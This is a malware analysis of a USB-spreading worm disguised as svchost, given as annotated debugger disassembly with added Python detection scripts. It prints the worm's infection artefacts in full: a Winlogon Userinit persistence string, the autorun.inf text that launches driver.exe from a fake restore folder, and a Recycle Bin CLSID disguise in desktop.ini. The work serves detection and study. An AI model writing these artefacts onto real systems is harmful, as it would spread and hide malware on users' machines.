0040A495 . 6>PUSH svchost.0042A274 ; |FileName = “C:\Documents and Settings\VICTOR\Desktop\log”
0040A49A . F>CALL DWORD PTR DS:[<&KERNEL32.SetFileA>; \SetFileAttributesA
0040A4A0 > B>MOV ECX,41

0040A4C7 . 5>PUSH EAX
0040A4C8 . 5>PUSH EBX
0040A4C9 . F>CALL ESI //Get module filename (parent file)
0040A4CB . 8>LEA ECX,DWORD PTR SS:[EBP-21C]
0040A4D1 . 5>PUSH ECX

Stack address=0012FE14, (ASCII “C:\WINDOWS\system32\userinit.exe,C:\Documents and Settings\VICTOR\Desktop\svchost.eVe -m”)
EAX=00000058

0040A4C9 . F>CALL ESI
0040A4CB . 8>LEA ECX,DWORD PTR SS:[EBP-21C]
0040A4D1 . 5>PUSH ECX
0040A4D2 . 6>PUSH svchost.00425FA8 ; ASCII “C:\WINDOWS\system32\userinit.exe,”
0040A4D7 . 6>PUSH svchost.00426114 ; ASCII “%s%s -m”
0040A4DC . 8>LEA EDX,DWORD PTR SS:[EBP-114]
0040A4E2 . 5>PUSH EDX
0040A4E3 . E>CALL svchost.004130C0
0040A4E8 . 8>LEA EAX,DWORD PTR SS:[EBP-114]
0040A4EE . 5>PUSH EAX
0040A4EF . 6>PUSH svchost.00425F9C ; ASCII “Userinit”
0040A4F4 . 6>PUSH svchost.00425F64 ; ASCII “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”
0040A4F9 . E>CALL svchost.004087A0
##
004087C6 |. E>CALL svchost.004130C0 is a generic string concatenator and validator
##

$-F4 > 80000002 |hKey = HKEY_LOCAL_MACHINE
$-F0 > 00425F64 |Subkey = “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”
$-EC > 00000000 |Reserved = 0
$-E8 > 000F003F |Access = KEY_ALL_ACCESS
$-E4 > 0012FBD0 \pHandle = 0012FBD0

004087D2 |. 8>ADD ESP,0C
004087D5 |. 8>LEA EDX,DWORD PTR SS:[ESP+4]
004087D9 |. 5>PUSH EDX ; /pHandle
004087DA |. 6>PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004087DF |. 6>PUSH 0 ; |Reserved = 0
004087E1 |. 5>PUSH EAX ; |Subkey
004087E2 |. 6>PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004087E7 |. F>CALL DWORD PTR DS:[<&ADVAPI32.RegOpenK>; \RegOpenKeyExA

0012FBD4 43 3A 5C 57 49 4E 44 4F C:\WINDO
0012FBDC 57 53 5C 73 79 73 74 65 WS\syste
0012FBE4 6D 33 32 5C 75 73 65 72 m32\user
0012FBEC 69 6E 69 74 2E 65 78 65 init.exe
0012FBF4 2C 43 3A 5C 44 6F 63 75 ,C:\Docu
0012FBFC 6D 65 6E 74 73 20 61 6E ments an
0012FC04 64 20 53 65 74 74 69 6E d Settin
0012FC0C 67 73 5C 56 49 43 54 4F gs\VICTO
0012FC14 52 5C 44 65 73 6B 74 6F R\Deskto
0012FC1C 70 5C 73 76 63 68 6F 73 p\svchos
0012FC24 74 2E 65 56 65 20 2D 6D t.eVe -m
0012FC2C 00 00 00 00 00 00 00 00 ……..

$-F8 > 00000050 |hKey = 50
$-F4 > 00425F9C |ValueName = “Userinit”
$-F0 > 00000000 |Reserved = 0
$-EC > 00000001 |ValueType = REG_SZ
$-E8 > 0012FBD4 |Buffer = 0012FBD4
$-E4 > 00000059 \BufSize = 59 (89.)

0040880F |. 5>PUSH ECX ; /BufSize
00408810 |. 8>LEA ECX,DWORD PTR SS:[ESP+C] ; |
00408814 |. 5>PUSH ECX ; |Buffer
00408815 |. 6>PUSH 1 ; |ValueType = REG_SZ
00408817 |. 5>PUSH EAX ; |Reserved => 0
00408818 |. 8>MOV EAX,DWORD PTR SS:[ESP+14] ; |
0040881C |. 5>PUSH EDX ; |ValueName
0040881D |. 5>PUSH EAX ; |hKey
0040881E |. F>CALL DWORD PTR DS:[<&ADVAPI32.RegSetVa>; \RegSetValueExA
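The Userinit value written above is the worm's persistence hook: Winlogon runs every comma-separated entry of that value at logon, so a defender's check is to flag anything that is not the stock userinit.exe. The parser below is an added example, not code from the original analysis; `check_userinit`, `UserinitEntry` and the `%SystemRoot%` mapping are assumptions, and the sample value is a constructed copy of the string seen in the stack dump.

```python
"""Parse a Winlogon 'Userinit' REG_SZ value and flag appended entries.

Reading the live key (winreg on Windows) is left to the caller so that this
check runs offline against a string, e.g. one exported from a forensic image.
"""
import ntpath
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Stock entry Windows writes; compared case-insensitively after %VAR% expansion.
STOCK_USERINIT = r"%SystemRoot%\system32\userinit.exe"

# Constructed sample: the string the analysed worm stores (see the stack dump above).
SAMPLE_VALUE = (r"C:\WINDOWS\system32\userinit.exe,"
                r"C:\Documents and Settings\VICTOR\Desktop\svchost.eVe -m")


@dataclass
class UserinitEntry:
    raw: str                                   # entry as it appears in the value
    path: str                                  # program path after %VAR% expansion
    args: List[str]                            # command-line arguments, if any
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def _expand(text: str, env: Dict[str, str]) -> str:
    """Expand %VAR% references from a caller-supplied map (keeps the check offline)."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def _split_command(entry: str) -> Tuple[str, List[str]]:
    """Split 'path [args]' for quoted and unquoted paths.

    Unquoted paths containing spaces (as in the sample) are resolved with a
    heuristic: the path ends at the first token that carries a file extension.
    """
    entry = entry.strip()
    if entry.startswith('"'):
        end = entry.find('"', 1)
        if end == -1:
            return entry.strip('"'), []
        return entry[1:end], entry[end + 1:].split()
    m = re.match(r"(.*?\.[A-Za-z0-9]{1,4})(?=\s|$)(.*)", entry)
    if not m:
        return entry, []
    return m.group(1), m.group(2).split()


def check_userinit(value: str, env: Optional[Dict[str, str]] = None) -> List[UserinitEntry]:
    """Return one UserinitEntry per comma-separated entry, with reasons for suspicion."""
    env = {k.lower(): v for k, v in (env or {"SystemRoot": r"C:\WINDOWS"}).items()}
    stock = ntpath.normcase(_expand(STOCK_USERINIT, env))
    system32 = ntpath.dirname(stock)
    results = []
    for raw in value.split(","):
        if not raw.strip():        # the stock value ends with a trailing comma
            continue
        path, args = _split_command(_expand(raw, env))
        entry = UserinitEntry(raw=raw.strip(), path=path, args=args)
        norm = ntpath.normcase(path)
        if norm != stock:
            entry.reasons.append("not the stock userinit.exe")
            if ntpath.dirname(norm) != system32:
                entry.reasons.append("program lives outside " + system32)
            if ntpath.splitext(norm)[1] != ".exe":
                entry.reasons.append("unusual extension %r" % ntpath.splitext(norm)[1])
        if args:
            entry.reasons.append("launched with arguments " + " ".join(args))
        results.append(entry)
    return results


if __name__ == "__main__":
    for e in check_userinit(SAMPLE_VALUE):
        status = "SUSPICIOUS" if e.suspicious else "ok"
        print("%-10s %s %s" % (status, e.path, " ".join(e.args)))
        for r in e.reasons:
            print("           - " + r)
```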

0040A4EF . 6>PUSH svchost.00425F9C ; ASCII “Userinit”
0040A4F4 . 6>PUSH svchost.00425F64 ; ASCII “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”
0040A4F9 . E>CALL svchost.004087A0
0040A4FE . 8>ADD ESP,1C
0040A501 . 6>PUSH svchost.00426110 ; ASCII “C:”
0040A506 . 8>LEA ECX,DWORD PTR SS:[EBP-118]
0040A50C . 5>PUSH ECX
0040A50D . E>CALL svchost.004130C0 ; string validator
0040A512 . 8>ADD ESP,8
0040A515 . C>MOV BYTE PTR SS:[EBP-118],43
0040A51C . B>MOV ESI,svchost.0042A5F0
0040A521 . 8>MOV EDI,DWORD PTR DS:[<&KERNEL32.GetDr>; kernel32.GetDriveTypeA

0012FE10 44 3A 00 00 43 3A 5C 57 D:..C:\W
0012FE18 49 4E 44 4F 57 53 5C 73 INDOWS\s
0012FE20 79 73 74 65 6D 33 32 5C ystem32\
0012FE28 75 73 65 72 69 6E 69 74 userinit

Drive Letters are shifted for the next iteration
0040A52E . F>CALL EDI
0040A530 . 3>XOR ECX,ECX
0040A532 . 8>CMP EAX,3 ; hard drive check (3 = DRIVE_FIXED)
0040A535 . 0>SETE CL ; set lower byte to 1 if zero flag is set
0040A538 . 8>MOV DWORD PTR DS:[ESI],ECX
0040A53A . 8>ADD ESI,4
0040A53D . 8>MOV AL,BYTE PTR SS:[EBP-118] ;move the drive letter to register
0040A543 . F>INC AL ; increase letter by one
0040A545 . 8>MOV BYTE PTR SS:[EBP-118],AL ; copy back to location for next cycle
0040A54B . 3>CMP AL,5A ; check for the Z: drive limit
0040A54D .^7>JL SHORT svchost.0040A527
0040A54F . 8>MOV DWORD PTR SS:[EBP-4],EBX
0040A552 . E>CALL svchost.004093D0
0040A557 . E>JMP SHORT svchost.0040A561

Drive iterating loop :

0040A527 > 8>LEA EDX,DWORD PTR SS:[EBP-118]
0040A52D . 5>PUSH EDX
0040A52E . F>CALL EDI
0040A530 . 3>XOR ECX,ECX
0040A532 . 8>CMP EAX,3
0040A535 . 0>SETE CL
0040A538 . 8>MOV DWORD PTR DS:[ESI],ECX
0040A53A . 8>ADD ESI,4
0040A53D . 8>MOV AL,BYTE PTR SS:[EBP-118]
0040A543 . F>INC AL
0040A545 . 8>MOV BYTE PTR SS:[EBP-118],AL
0040A54B . 3>CMP AL,5A
0040A54D .^7>JL SHORT svchost.0040A527

0012FE10 5A 3A 00 00 43 3A 5C 57 49 4E 44 4F 57 53 5C 73 Z:..C:\WINDOWS\s
0012FE20 79 73 74 65 6D 33 32 5C 75 73 65 72 69 6E 69 74 ystem32\userinit

Dump at the end of the iteration.

0040A54D .^7>JL SHORT svchost.0040A527
0040A54F . 8>MOV DWORD PTR SS:[EBP-4],EBX
0040A552 . E>CALL svchost.004093D0 ; USB INFECTION COMPLETE ROUTINE
0040A557 . E>JMP SHORT svchost.0040A561

0040A55F . 3>XOR EBX,EBX
0040A561 > C>MOV DWORD PTR SS:[EBP-4],-1
0040A568 . 6>PUSH 1388 ; /Timeout = 5000. ms
0040A56D . F>CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
00409556 |> 8>/MOV ESI,DWORD PTR SS:[ESP+18]
0040955A |> 8> LEA ECX,DWORD PTR SS:[ESP+14]
0040955E |. 5>|PUSH ECX ; /RootPathName
0040955F |. F>|CALL DWORD PTR DS:[<&KERNEL32.GetDriv>; \GetDriveTypeA
00409565 |. 8>|CMP EAX,2 ; 2 on removable drive or emulation by setting the register
00409568 |. 7>|JE SHORT svchost.0040957B
0040956A |. 8>|CMP EAX,3
0040956D |. 7>|JE SHORT svchost.0040957B
0040956F |. 8>|MOV DWORD PTR DS:[ESI*4+42A588],EBX
00409576 |. E>|JMP svchost.0040A1A1
0040957B |> 8>|CMP DWORD PTR DS:[ESI*4+42A5F0],1
00409583 |. 7>|JNZ SHORT svchost.0040958F
00409585 |. 4>|INC ESI
00409586 |. 8>|MOV DWORD PTR SS:[ESP+18],ESI

$-1050 > 0012EC74 ASCII “C:\System_Volume_Information”

00408470 /$ 8>SUB ESP,200
00408476 |. B>MOV ECX,3F
0040847B |. 3>XOR EAX,EAX
0040847D |. 5>PUSH ESI
0040847E |. 5>PUSH EDI
0040847F |. 8>LEA EDI,DWORD PTR SS:[ESP+8]
00408483 |. 6>PUSH svchost.00425A18 ; ASCII “\System_Volume_Information”
00408488 |. F>REP STOS DWORD PTR ES:[EDI]
0040848A |. 6>STOS WORD PTR ES:[EDI]
0040848C |. A>STOS BYTE PTR ES:[EDI]
0040848D |. 8>MOV EAX,DWORD PTR SS:[ESP+210]
00408494 |. 8>LEA ECX,DWORD PTR SS:[ESP+C]
00408498 |. 5>PUSH EAX
00408499 |. 6>PUSH svchost.004252C0 ; ASCII “%s%s”
0040849E |. 5>PUSH ECX
0040849F |. E>CALL svchost.004130C0
004084A4 |. 8>MOV EDI,DWORD PTR DS:[<&KERNEL32.Creat>; kernel32.CreateDirectoryA
004084AA |. 8>ADD ESP,10
0012EC5C 0012EC74 ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}”

004084F9 |. 5>PUSH EDX
004084FA |. E>CALL svchost.00413E46
004084FF |. 8>ADD ESP,8
00408502 |. 8>CMP EAX,-1 ; check for successful creation of the directory and its attributes
00408505 |. 7>JNZ SHORT svchost.00408512 ; branch if successful
00408507 |. 5>POP EDI
00408508 |. 3>XOR EAX,EAX
0040850A |. 5>POP ESI
0040850B |. 8>ADD ESP,200
00408511 |. C>RETN

00408512 |> 8>LEA EAX,DWORD PTR SS:[ESP+8]
00408516 |. 6>PUSH svchost.004259E8 ; ASCII “\driver.exe”
0040851B |. 5>PUSH EAX
0040851C |. 8>LEA ECX,DWORD PTR SS:[ESP+10]
00408520 |. 6>PUSH svchost.004252C0 ; ASCII “%s%s”
00408525 |. 5>PUSH ECX
00408526 |. E>CALL svchost.004130C0
0040852B |. B>MOV ECX,3F
00408530 |. 3>XOR EAX,EAX
00408532 |. 8>LEA EDI,DWORD PTR SS:[ESP+118]
00408539 |. 8>ADD ESP,10
0040853C |. F>REP STOS DWORD PTR ES:[EDI]
0040853E |. 6>STOS WORD PTR ES:[EDI]
00408540 |. 8>LEA EDX,DWORD PTR SS:[ESP+108]
00408547 |. 6>PUSH 0FF ; /BufSize = FF (255.)
0040854C |. 5>PUSH EDX ; |PathBuffer
0040854D |. 6>PUSH 0 ; |hModule = NULL
0040854F |. A>STOS BYTE PTR ES:[EDI] ; |
00408550 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetModul>; \GetModuleFileNameA

Stack address=0012EC74, (ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe”)
EAX=00000034
0012EC60 0012ED74 |ExistingFileName = “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0012EC64 0012EC74 |NewFileName = “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe”
0012EC68 00000001 \FailIfExists = TRUE
0012EC6C 0012F7D0

0040858A |> 8>LEA EAX,DWORD PTR SS:[ESP+8]
0040858E |. 6>PUSH 1 ; /FailIfExists = TRUE
00408590 |. 8>LEA ECX,DWORD PTR SS:[ESP+10C] ; |
00408597 |. 5>PUSH EAX ; |NewFileName
00408598 |. 5>PUSH ECX ; |ExistingFileName
00408599 |. F>CALL DWORD PTR DS:[<&KERNEL32.CopyFile>; \CopyFileA

0040859F |. 8>LEA EDX,DWORD PTR SS:[ESP+8]
004085A3 |. 6>PUSH 7 ; readonly|hidden
004085A5 |. 5>PUSH EDX
004085A6 |. F>CALL ESI ; call to set attribute
004085A8 |. 5>POP EDI
004085A9 |. B>MOV EAX,1

00408970 /$ 5>PUSH ESI
00408971 |. 8>MOV ESI,DWORD PTR SS:[ESP+8]
00408975 |. 5>PUSH ESI
00408976 |. E>CALL svchost.00408470 ; calls the infection routine
0040897B |. 8>ADD ESP,4

Returns to the above address.

00408970 /$ 5>PUSH ESI
00408971 |. 8>MOV ESI,DWORD PTR SS:[ESP+8]
00408975 |. 5>PUSH ESI
00408976 |. E>CALL svchost.00408470
0040897B |. 8>ADD ESP,4
0040897E |. 8>TEST EAX,EAX ; checks if the previous routine for driver.exe was successful
00408980 |. 7>JNZ SHORT svchost.00408984
00408982 |. 5>POP ESI
00408983 |. C>RETN
00408984 |> 5>PUSH ESI ; next payload is for the autorun.inf file at
00408985 |. E>CALL svchost.00408160 ; autorun infection routine
0040898A |. 8>ADD ESP,4
0040898D |. 8>TEST EAX,EAX
0040898F |. 7>JNZ SHORT svchost.00408993
00408991 |. 5>POP ESI
00408992 |. C>RETN
00408993 |> 5>PUSH ESI
00408994 |. E>CALL svchost.004085C0
00408999 |. 8>ADD ESP,4
0040899C |. B>MOV EAX,1
004089A1 |. 5>POP ESI
004089A2 \. C>RETN

00412893 |. C>MOV DWORD PTR DS:[42A69C],18
0041289D |. E>JMP SHORT svchost.004128DD
0041289F |> 6>PUSH 0 ; /hTemplateFile = NULL
004128A1 |. 5>PUSH ESI ; |Attributes
004128A2 |. F>PUSH DWORD PTR SS:[EBP-8] ; |Mode
004128A5 |. 8>LEA EAX,DWORD PTR SS:[EBP-1C] ; |
004128A8 |. 5>PUSH EAX ; |pSecurity
004128A9 |. F>PUSH DWORD PTR SS:[EBP-10] ; |ShareMode
004128AC |. F>PUSH DWORD PTR SS:[EBP-C] ; |Access
004128AF |. F>PUSH DWORD PTR SS:[EBP+8] ; |FileName
004128B2 |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateFi>; \CreateFileA
004128B8 |. 8>MOV ESI,EAX

0012EBB8 0012ED70 |FileName = “C:\autorun.inf”
0012EBBC 40000000 |Access = GENERIC_WRITE
0012EBC0 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0012EBC4 0012EBE0 |pSecurity = 0012EBE0
0012EBC8 00000004 |Mode = OPEN_ALWAYS
0012EBCC 00000080 |Attributes = NORMAL
0012EBD0 00000000 \hTemplateFile = NULL
0012EBD4 004259D5 svchost.004259D5

0012EBCC 00000080
0012EBD0 00000058 \hFile = 00000058
0012EBD4 004259D5 svchost.004259D5

004081E8 |. 0>JE svchost.00408456
004081EE |. 8>LEA EDX,DWORD PTR SS:[ESP+114]
004081F5 |. 6>PUSH 2
004081F7 |. 5>PUSH EDX
004081F8 |. F>CALL EBX ; kernel32.SetFileAttributesA
004081FA |. B>MOV ECX,41
004081FF |. 3>XOR EAX,EAX
00408201 |. 8>LEA EDI,DWORD PTR SS:[ESP+10]
00408205 |. 6>PUSH svchost.004259C8 ; ASCII “[AutoRun”
0040820A |. F>REP STOS DWORD PTR ES:[EDI]
0040820C |. 8>LEA EAX,DWORD PTR SS:[ESP+14]
00408210 |. 6>PUSH svchost.004259C4 ; ASCII “%s

00408215 |. 5>PUSH EAX

0012EC6C 73 68 65 6C 6C 5C 45 78 shell\Ex
0012EC74 70 6C 6F 72 65 5C 63 6F plore\co
0012EC7C 6D 6D 61 6E 64 3D 53 79 mmand=Sy
0012EC84 73 74 65 6D 5F 56 6F 6C stem_Vol
0012EC8C 75 6D 65 5F 49 6E 66 6F ume_Info
0012EC94 72 6D 61 74 69 6F 6E 5C rmation\
0012EC9C 5F 72 65 73 74 6F 72 65 _restore
0012ECA4 7B 32 36 38 36 34 43 31 {26864C1
0012ECAC 37 2D 31 38 44 44 2D 34 7-18DD-4
0012ECB4 35 36 31 2D 38 34 31 30 561-8410
0012ECBC 7D 5C 64 72 69 76 65 72 }\driver
0012ECC4 2E 65 78 65 20 2D 65 0A .exe -e.

0012E7D4 00000058 |hFile = 00000058
0012E7D8 0012E7F4 |Buffer = 0012E7F4
0012E7DC 0000012D |nBytesToWrite = 12D (301.)
0012E7E0 0012EBFC |pBytesWritten = 0012EBFC
0012E7E4 00000000 \pOverlapped = NULL

00412C72 |. 8>|LEA EAX,DWORD PTR SS:[EBP-414]
00412C78 |. 2>|SUB EDI,EAX
00412C7A |. 8>|LEA EAX,DWORD PTR SS:[EBP-C]
00412C7D |. 6>|PUSH 0 ; /pOverlapped = NULL
00412C7F |. 5>|PUSH EAX ; |pBytesWritten
00412C80 |. 8>|LEA EAX,DWORD PTR SS:[EBP-414] ; |
00412C86 |. 5>|PUSH EDI ; |nBytesToWrite
00412C87 |. 5>|PUSH EAX ; |Buffer
00412C88 |. 8>|MOV EAX,DWORD PTR DS:[EBX] ; |
00412C8A |. F>|PUSH DWORD PTR DS:[EAX+ESI] ; |hFile
00412C8D |. F>|CALL DWORD PTR DS:[<&KERNEL32.WriteFi>; \WriteFile
00412C93 |. 8>|TEST EAX,EAX

0012E7F4 5B 41 75 74 6F 52 75 6E [AutoRun
0012E7FC 0D 0A 73 68 65 6C 6C 65 ..shelle
0012E804 78 65 63 75 74 65 3D 53 xecute=S
0012E80C 79 73 74 65 6D 5F 56 6F ystem_Vo
0012E814 6C 75 6D 65 5F 49 6E 66 lume_Inf
0012E81C 6F 72 6D 61 74 69 6F 6E ormation
0012E824 5C 5F 72 65 73 74 6F 72 \_restor
0012E82C 65 7B 32 36 38 36 34 43 e{26864C
0012E834 31 37 2D 31 38 44 44 2D 17-18DD-
0012E83C 34 35 36 31 2D 38 34 31 4561-841
0012E844 30 7D 5C 64 72 69 76 65 0}\drive
0012E84C 72 2E 65 78 65 20 2D 6F r.exe -o
0012E854 0D 0A 73 68 65 6C 6C 5C ..shell\
0012E85C 4F 70 65 6E 5C 63 6F 6D Open\com
0012E864 6D 61 6E 64 3D 53 79 73 mand=Sys
0012E86C 74 65 6D 5F 56 6F 6C 75 tem_Volu
0012E874 6D 65 5F 49 6E 66 6F 72 me_Infor
0012E87C 6D 61 74 69 6F 6E 5C 5F mation\_
0012E884 72 65 73 74 6F 72 65 7B restore{
0012E88C 32 36 38 36 34 43 31 37 26864C17
0012E894 2D 31 38 44 44 2D 34 35 -18DD-45
0012E89C 36 31 2D 38 34 31 30 7D 61-8410}
0012E8A4 5C 64 72 69 76 65 72 2E \driver.
0012E8AC 65 78 65 20 2D 6F 0D 0A exe -o..
0012E8B4 73 68 65 6C 6C 3D 4F 70 shell=Op
0012E8BC 65 6E 0D 0A 73 68 65 6C en..shel
0012E8C4 6C 5C 45 78 70 6C 6F 72 l\Explor
0012E8CC 65 5C 63 6F 6D 6D 61 6E e\comman
0012E8D4 64 3D 53 79 73 74 65 6D d=System
0012E8DC 5F 56 6F 6C 75 6D 65 5F _Volume_
0012E8E4 49 6E 66 6F 72 6D 61 74 Informat
0012E8EC 69 6F 6E 5C 5F 72 65 73 ion\_res
0012E8F4 74 6F 72 65 7B 32 36 38 tore{268
0012E8FC 36 34 43 31 37 2D 31 38 64C17-18
0012E904 44 44 2D 34 35 36 31 2D DD-4561-
0012E90C 38 34 31 30 7D 5C 64 72 8410}\dr
0012E914 69 76 65 72 2E 65 78 65 iver.exe
0012E91C 20 2D 65 0D 0A 02 00 00 -e…..
[AutoRun
shellexecute=System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe -o
shell\Open\command=System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe -o
shell=Open
shell\Explore\command=System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe -e

 

004126DD |> 5>PUSH ESI
004126DE |> 6>PUSH 0 ; |Flags = 0
004126E0 |. F>PUSH DWORD PTR DS:[42BE60] ; |hHeap = 008B0000 ; this address is the heap area of the construction of autorun.inf
004126E6 |. F>CALL DWORD PTR DS:[<&KERNEL32.HeapFree>; \HeapFree
004126EC |> 5>POP ESI

00408401 |. 83>ADD ESP,18
00408404 |. F3>REP STOS DWORD PTR ES:[EDI]
00408406 |. 8D>LEA EAX,DWORD PTR SS:[ESP+10]
0040840A |. 68>PUSH svchost.00425830 ; ASCII “CLSID={645FF040-5081-101B-9F08-00AA002F954E}

0040840F |. 50 PUSH EAX
00408410 |. E8>CALL svchost.004130C0
00408415 |. 8D>LEA EDI,DWORD PTR SS:[ESP+18]

0012EC54 0012EC6C ASCII “CLSID={645FF040-5081-101B-9F08-00AA002F954E}

0012EC58 00425830 ASCII “CLSID={645FF040-5081-101B-9F08-00AA002F954E}

0012EC5C 0012F7D0

0012E7D8 00000058 |hFile = 00000058
0012E7DC 0012E7F8 |Buffer = 0012E7F8
0012E7E0 00000041 |nBytesToWrite = 41 (65.)
0012E7E4 0012EC00 |pBytesWritten = 0012EC00
0012E7E8 00000000 \pOverlapped = NULL
0012E7EC 0000003F

0012E7F8 5B 2E 53 68 65 6C 6C 43 [.ShellC
0012E800 6C 61 73 73 49 6E 66 6F lassInfo
0012E808 5D 0D 0A 43 4C 53 49 44 ]..CLSID
0012E810 3D 7B 36 34 35 46 46 30 ={645FF0
0012E818 34 30 2D 35 30 38 31 2D 40-5081-
0012E820 31 30 31 42 2D 39 46 30 101B-9F0
0012E828 38 2D 30 30 41 41 30 30 8-00AA00
0012E830 32 46 39 35 34 45 7D 0D 2F954E}.

[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
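The autorun.inf and desktop.ini reconstructed above, run through an added detection helper (example code, not the worm's or the author's; `parse_ini_lenient`, `check_autorun`, `check_desktop_ini` and `scan_files` are names chosen here). The sample contents are copied from the reconstructions; the parser deliberately accepts the `[AutoRun` header without its closing bracket, exactly as the worm writes it, because a strict INI parser would discard the whole section and miss the indicators.

```python
import re
from dataclasses import dataclass, field

# Shell class id the worm writes into desktop.ini (taken from the analysis above).
# It is the Recycle Bin CLSID, so Explorer draws the dropper folder as a Recycle Bin.
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"

# [AutoRun] keys that make Explorer run a command; the worm sets the last three.
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command", "shell\\explore\\command")

# The worm writes "[AutoRun" with no closing bracket (see the WriteFile buffer above),
# so the ']' is optional here; a strict INI parser would drop the whole section.
SECTION_RE = re.compile(r"^\s*\[([^\]\r\n]*)\]?\s*$")
KEY_VALUE_RE = re.compile(r"^\s*([^=\r\n]+?)\s*=\s*(.*?)\s*$")
FAKE_RESTORE_DIR_RE = re.compile(r"system_volume_information\\_restore\{", re.IGNORECASE)
COMMAND_RE = re.compile(r'^"?(.+?\.exe)"?(?:\s+(\S.*))?$', re.IGNORECASE)


def parse_ini_lenient(text: str) -> dict:
    """Return {section: {key: value}} with section and key names lower-cased.

    Windows treats both case-insensitively; CRLF and LF line endings are accepted.
    """
    sections, current = {}, None
    for line in text.splitlines():
        section = SECTION_RE.match(line)
        if section:
            current = section.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        pair = KEY_VALUE_RE.match(line)
        if pair and current is not None:
            sections[current][pair.group(1).lower()] = pair.group(2)
    return sections


def check_autorun(text: str) -> list:
    """Reasons an autorun.inf matches this worm's dropper pattern (empty if none)."""
    reasons = []
    autorun = parse_ini_lenient(text).get("autorun", {})
    for key, value in autorun.items():
        if key not in LAUNCH_KEYS:
            continue
        cmd = COMMAND_RE.match(value.strip())
        if not cmd:
            continue
        exe, args = cmd.group(1), cmd.group(2) or ""
        if FAKE_RESTORE_DIR_RE.search(exe):
            reasons.append(f"{key} runs {exe} from a fake System Volume Information restore folder")
        if args:
            reasons.append(f"{key} passes command-line switch(es) {args!r}")
    if autorun.get("shell", "").lower() in ("open", "explore"):
        reasons.append("default verb 'shell' is redirected, so double-clicking the drive runs it")
    return reasons


def check_desktop_ini(text: str) -> list:
    """Reason a desktop.ini disguises its folder as the Recycle Bin (empty if none)."""
    clsid = parse_ini_lenient(text).get(".shellclassinfo", {}).get("clsid", "").upper()
    if clsid == RECYCLE_BIN_CLSID:
        return ["desktop.ini assigns the Recycle Bin CLSID, disguising the dropper folder"]
    return []


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)


def scan_files(files: dict) -> list:
    """files maps a path (relative to the drive root) to its text; returns Findings."""
    findings = []
    for path, text in files.items():
        name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        checker = {"autorun.inf": check_autorun, "desktop.ini": check_desktop_ini}.get(name)
        if checker and (reasons := checker(text)):
            findings.append(Finding(path, reasons))
    return findings


# Sample inputs constructed from the reconstructions in the analysis above.
SAMPLE_AUTORUN_INF = (
    "[AutoRun\r\n"
    "shellexecute=System_Volume_Information\\_restore{26864C17-18DD-4561-8410}\\driver.exe -o\r\n"
    "shell\\Open\\command=System_Volume_Information\\_restore{26864C17-18DD-4561-8410}\\driver.exe -o\r\n"
    "shell=Open\r\n"
    "shell\\Explore\\command=System_Volume_Information\\_restore{26864C17-18DD-4561-8410}\\driver.exe -e\r\n"
)
SAMPLE_DESKTOP_INI = "[.ShellClassInfo]\r\nCLSID={645FF040-5081-101B-9F08-00AA002F954E}\r\n"

if __name__ == "__main__":
    for finding in scan_files({"autorun.inf": SAMPLE_AUTORUN_INF, "desktop.ini": SAMPLE_DESKTOP_INI}):
        print(finding.path)
        for reason in finding.reasons:
            print("  -", reason)
```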
00408992 |. C3 RETN
00408993 |> 56 PUSH ESI
00408994 |. E8>CALL svchost.004085C0 ; UsbDriver.tlb payload
00408999 |. 83>ADD ESP,4
0040899C |. B8>MOV EAX,1
004089A1 |. 5E POP ESI
004089A2 \. C3 RETN

Next Payload is usbdriver.tlb

0012EC5C 0012EC6C ASCII “C:\Documents and Settings\VICTOR\Desktop\UsbDriver.tlb”
0012EC60 00425A34 ASCII “%s\UsbDriver.tlb”
0012EC64 0012EC6C ASCII “C:\Documents and Settings\VICTOR\Desktop\UsbDriver.tlb”
0012EC68 0012EE9C ASCII “C:”

Proceeding to the drive.tlb payload and its preparation:

004096ED |. 8D>|LEA EDX,DWORD PTR SS:[ESP+128]
004096F4 |. F3>|REP STOS DWORD PTR ES:[EDI]
004096F6 |. 68>|PUSH svchost.00426084 ; ASCII “KB946625.tmp”
004096FB |. 52 |PUSH EDX
004096FC |. 8D>|LEA EAX,DWORD PTR SS:[ESP+43C]
00409703 |. 68>|PUSH svchost.00426108 ; ASCII “%s\%s”
00409708 |. 50 |PUSH EAX
0012EE78 0012F2BC ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\KB946625.tmp”
0012EE7C 00426108 ASCII “%s\%s”

00409736 |. 8D>|LEA EDI,DWORD PTR SS:[ESP+740] ; points to Stack address=0012F5C8
EDI=0012F3C0, (ASCII “C:\Documents and Settings\VICTOR\Desktop\drive.tlb”)

0040973D |. 68>|PUSH svchost.00425FD8 ; ASCII “Shared.dll”
00409742 |. F3>|REP STOS DWORD PTR ES:[EDI]
00409744 |. 8D>|LEA EAX,DWORD PTR SS:[ESP+640]
0040974B |. 8D>|LEA ECX,DWORD PTR SS:[ESP+744]
00409752 |. 50 |PUSH EAX

0012EE78 0012F5C8 ASCII “C:\Documents and Settings\VICTOR\Desktop\Shared.dll”
